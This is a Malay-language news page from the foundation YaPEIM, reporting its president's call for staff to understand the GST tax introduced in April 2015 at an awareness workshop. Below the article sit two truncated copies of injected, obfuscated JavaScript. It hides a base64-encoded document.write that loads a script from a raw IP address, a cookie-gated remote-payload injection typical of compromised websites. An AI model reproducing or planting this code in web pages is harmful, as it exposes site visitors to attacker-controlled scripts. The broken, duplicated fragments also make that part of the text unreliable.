YaPEIM » Warga YaPEIM perlu faham GST – Presiden

Terkini

Warga YaPEIM perlu faham GST – Presiden

Dato’ Abd Malek Awang Kechil mengajak warga YaPEIM menjauhi persepsi salah mengenai sistem cukai yang baru, GST.

WARGA YaPEIM diajak untuk memahami sistem cukai barangan dan perkhidmatan (GST) yang akan dilaksanakan di negara ini mulai 1 April 2015, dan menjauhi persepsi yang salah mengenai sistem cukai yang baru itu.

“Yakinlah kepemimpinan negara dan para profesional (di Kementerian Kewangan) mahu melaksanakan GST atas kesedaran untuk masa depan negara dan untuk kebaikan kepada masyarakat keseluruhan.

“Kalau adapun yang berbeza  pandangan di kalangan warga YaPEIM dari segi pelaksanaan,  dan atas dasar YaPEIM begitu dekat dengan kerajaan,  ada ruang-ruang untuk memberi pandangan konstruktif untuk menambaik sistem cukai berkenaan.

“Apa yang saya harapkan dengan warga YaPEIM ialah kita tidak boleh ada pandangan-pandangan liar mengenai GST, sedangkan kita sendiri belum memahaminya,” kata Presiden & Pengerusi Lembaga Pemegang Amanah YaPEIM, Dato’ Abd Malek Awang Kechil dalam majlis perasmian Bengkel Kesedaran GST, di Dewan Utama YaPEIM, Tingkat 7, Grans Seasons Avenue, pagi ini.

Majlis berkenaan dirasmikan oleh Timbalan Ketua Setiausaha Perbendaharaan Kementerian Kewangan, Dato’ Mat Noor bin Nawi yang juga Ahli Lembaga Pemegang Amanah YaPEIM.

Turut hadir  Ahli Lembaga Pemegang Amanah YaPEIM, Tn Hj Mokhtar Abdul Razak; Ketua Pengarah YaPEIM, En.Abibullah Hj Samsudin; Pengarah-Pengarah Kanan, Pn Parihah Hasan, Pn Hjh Sharina Ramli, Tn Hj Mohammad Zamri Zakaria dan warga YaPEIM

Bengkel itu antara lain bertujuan:

– untuk memupuk kesedaran mengenai GST kepada pihak pengurusan dan pegawai YaPEIM dan institusinya;

– Memahami GST dan pelaksanaannya di Malaysia; dan

– Mendalami perkara-perkara teknikal berkenaan pelaksanaan GST seperti mekanisme cukai input, pengakaunan, bayaran, peraturan-peraturan peralihan dan lain-lain.

Abd Malek berkata, warga YaPEIM perlu mendapatkan maklumat yang sahih mengenai GST daripada seseorang profersional dari Kementerian Kewangan atau dari pihak-pihak yang memahami dengan sebenarnya hal-hal GST.

“Yang akan menambah buruk keadaan apabila ada pihak-pihak tertentu yang memberikan kefahaman yang salah kerana mempunyai kepentingan tertentu.

“Warga YaPEIM mestilah tidak tersudut dalam menerima persepsi yang salah,” katanya.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top